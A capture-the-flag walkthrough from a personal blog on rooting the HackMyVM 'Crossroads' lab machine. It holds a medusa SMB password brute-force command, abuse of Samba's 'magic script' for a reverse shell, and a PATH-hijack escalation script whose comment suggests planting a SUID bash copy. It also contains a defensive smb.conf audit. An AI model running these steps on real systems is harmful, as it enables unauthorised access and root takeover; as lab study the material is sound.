Windy's little blog

Odds and ends from everyday life, and I like CTF.

HackMyVm Crossroads Walkthrough

The machine can be downloaded here.


An Nmap scan shows three open ports: 80 (HTTP), 139 and 445 (SMB).

Port 80 serves a static index.html with nothing interesting. A Gobuster scan of port 80 turns up robots.txt and note.txt, but neither contains anything useful either.

Moving on to SMB. Listing shares with smbclient and no username or password (a null session) reveals an interesting share named "smbshare".

But we cannot access it yet: it requires a username and password.

enum4linux enumerates a user named "albert".

With medusa we can brute-force albert's password against SMB using the smbnt module. (I don't know why hydra failed.)

medusa -h 192.168.56.71 -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt

Then we can access the smbshare share and list its files.

Download smb.conf and check its contents: it contains an interesting setting.

Samba's documentation explains the "magic script" parameter: when a file with the configured name is written to the share and then closed, the server executes it on behalf of the connected user. So anyone who can write to this share can run commands on the server as that user.
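
To make the setting concrete, here is an added example (not the machine's real smb.conf, and not code from the original post): a constructed share definition carrying the dangerous parameter, the same share with it removed, and a small shell check that lists every share in an smb.conf that still defines a magic script. The share name, paths and script name are assumptions for illustration.

```shell
#!/bin/sh
# Added example: audit smb.conf for Samba's "magic script" parameter.
# Both configs below are constructed for illustration; they are not the
# file recovered from the machine.  Share names and paths are assumptions.

# Vulnerable: anyone who can write to [smbshare] can drop a file named
# smbscript.sh and Samba executes it as the connected user when the file
# is closed.  Its output goes to "magic output" (default: <script>.out).
VULN_CONF='[global]
   workgroup = WORKGROUP

[smbshare]
   path = /home/albert/smbshare
   writable = yes
   magic script = smbscript.sh
   magic output = /tmp/smbscript.out
'

# Hardened: the parameter has no "off" value, so the fix is to remove it
# (commenting it out has the same effect).  Making the share read-only
# would also block the upload, but the setting itself is what should go.
SAFE_CONF='[global]
   workgroup = WORKGROUP

[smbshare]
   path = /home/albert/smbshare
   writable = yes
   ; magic script = smbscript.sh
'

# Read an smb.conf on stdin and print "share<TAB>script" for every active
# magic script.  Samba parameter names are case-insensitive and ignore
# internal whitespace, so the key is normalised before comparing.
find_magic_scripts() {
  awk '
    /^[ \t]*\[.*][ \t]*$/ {                 # [section] header
      share = $0
      sub(/^[ \t]*\[/, "", share); sub(/][ \t]*$/, "", share)
      next
    }
    /^[ \t]*[;#]/ { next }                  # commented out, so inactive
    /=/ {
      key = $0; sub(/=.*/, "", key); gsub(/[ \t]/, "", key)
      if (tolower(key) == "magicscript") {
        val = $0; sub(/^[^=]*=[ \t]*/, "", val); sub(/[ \t]+$/, "", val)
        print share "\t" val
      }
    }'
}

# Wrapper for a real file, e.g.  audit_file /etc/samba/smb.conf
audit_file() {
  find_magic_scripts < "$1"
}

printf '%s' "$VULN_CONF" | find_magic_scripts    # smbshare<TAB>smbscript.sh
printf '%s' "$SAFE_CONF" | find_magic_scripts    # prints nothing
```

Run `audit_file` against the server's smb.conf after any change; an empty result means no share can be turned into a command-execution channel this way.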

Create a script named "smbscript.sh" (the name configured in smb.conf) containing a reverse shell.

Start a listener on port 1234 in one terminal and upload the script to the share from another. The reverse shell connects back as soon as the upload completes.

Upgrade to an interactive TTY with python3 and set the TERM variable.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color


In albert's home directory there is a file named "beroot". It is a SUID binary, so it is presumably the intended route to root.

Running beroot clears the screen and prompts for a password, which we do not know.

With Ghidra we can decompile the ELF. It does only two things: it calls setuid(0), then it runs "/bin/bash /root/beroot.sh".

Brute-forcing that password is not an option, but since the script runs as root after setuid(0), /root/beroot.sh itself is the way to root.

Since it is a bash script started with our environment, any external command it calls by bare name is resolved through our PATH, so we can hijack it with a fake binary. But how do we find out which commands beroot.sh calls when we cannot read it?

First, empty the PATH variable and run beroot again. With no PATH, bash cannot find any external command the script calls, and its error message names the command and the line number.

Now we know beroot.sh calls "clear" at line 3.

So we create a fake "clear" in the home directory and export a PATH that puts that directory first. Don't forget to chmod +x clear.

Run beroot again. BOOM! The fake clear runs as root, and we get root.
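
The whole escalation, as an added example that is not part of the original post: it reproduces both steps (empty PATH to learn the command name, then a fake clear placed first in PATH) against a constructed stand-in for /root/beroot.sh, because the real script cannot be read and the page only shows that its line 3 calls clear. The stand-in's contents and all paths are assumptions; it runs as an unprivileged user anywhere bash is installed, and on the box you would point the same steps at the real beroot.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): the two-step PATH hijack,
# demonstrated against a constructed stand-in for /root/beroot.sh so it runs
# without the machine.  The real script is unreadable; the page only shows
# that line 3 calls "clear", so the stand-in puts a bare "clear" on line 3.
BASH_BIN="$(command -v bash)"

make_stand_in() {               # $1 = work dir
  cat > "$1/beroot.sh" <<'EOF'
#!/bin/bash
# constructed stand-in for /root/beroot.sh (real contents unknown)
clear
printf 'Password: '
read -r pw
if [ "$pw" = "secret" ]; then echo "would be root here"; else echo "Wrong password"; fi
EOF
}

# Step 1: run the script with an empty PATH.  Builtins still work, but every
# external command fails and bash names it together with its line number.
# Both wordings bash uses ("command not found" / "No such file or directory")
# are accepted.  Output looks like "clear (line 3)".
reveal_external_commands() {    # $1 = work dir
  PATH= "$BASH_BIN" "$1/beroot.sh" </dev/null 2>&1 |
    grep -E 'line [0-9]+: [^:]+: (command not found|No such file or directory)' |
    sed 's/^.*: line \([0-9][0-9]*\): \([^:]*\): .*$/\2 (line \1)/'
}

# Step 2: put a fake "clear" first in PATH.  It runs with the privileges of
# the process that invoked the script: root on the box, because the SUID
# wrapper called setuid(0) first.  Here it only records who ran it; on the
# target something like  cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash
# would leave a root shell behind.
plant_fake_clear() {            # $1 = work dir
  mkdir -p "$1/hijack"
  cat > "$1/hijack/clear" <<'EOF'
#!/bin/bash
echo "hijacked clear running as $(id -un) (uid $(id -u))"
EOF
  chmod +x "$1/hijack/clear"    # without this bash reports "Permission denied"
}

# Run the stand-in with the hijack directory ahead of the normal PATH and
# return the line our fake clear printed.
run_hijacked() {                # $1 = work dir
  PATH="$1/hijack:$PATH" "$BASH_BIN" "$1/beroot.sh" </dev/null 2>&1 |
    grep '^hijacked clear'
}

demo() {
  dir="$(mktemp -d)"
  make_stand_in "$dir"
  echo "external commands called: $(reveal_external_commands "$dir")"
  plant_fake_clear "$dir"
  run_hijacked "$dir"
  rm -rf "$dir"
}

demo
```

The defensive lesson sits in the wrapper, not the script: a SUID program that hands control to bash must set PATH itself (or the script must use absolute paths for every external command) instead of trusting whatever environment the caller supplies.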


  • Comments
  •  tasiyanci
     Posted 2021-03-07 04:24:26
  • Hey! It's me, tasiyanci. I have corrected the machine, so please download and solve the corrected version. :') Keep up the good work


Powered By Z-BlogPHP 1.7.0